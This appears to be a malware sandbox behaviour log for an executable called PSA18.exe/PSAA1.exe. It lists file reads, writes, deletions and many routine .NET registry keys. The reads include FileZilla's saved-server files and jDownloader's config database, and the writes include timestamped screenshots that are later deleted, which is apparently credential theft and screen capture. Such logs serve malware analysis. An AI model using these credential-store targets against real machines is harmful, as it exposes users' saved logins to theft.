C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll C:\Windows\Globalization\en.nlp C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\jDownloader\config\database.script C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\PSA18.exe.config C:\Users\Seven01\AppData\Local\Temp\PSA18.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll \Device\NamedPipe\ C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\Desktop\PSAA1.exe.config C:\Users\Seven01\Desktop\PSAA1.exe C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\System32\tzres.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Write Files
C:\Users\Seven01\Desktop\PSAA1.exe C:\Users\Seven01\AppData\Local\Temp\PSA.txt C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.10840953 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.10840953 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.10840984 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2620.10842828 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2620.10842828 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2620.10842828 C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSA18.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4dee4266\5e123865
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
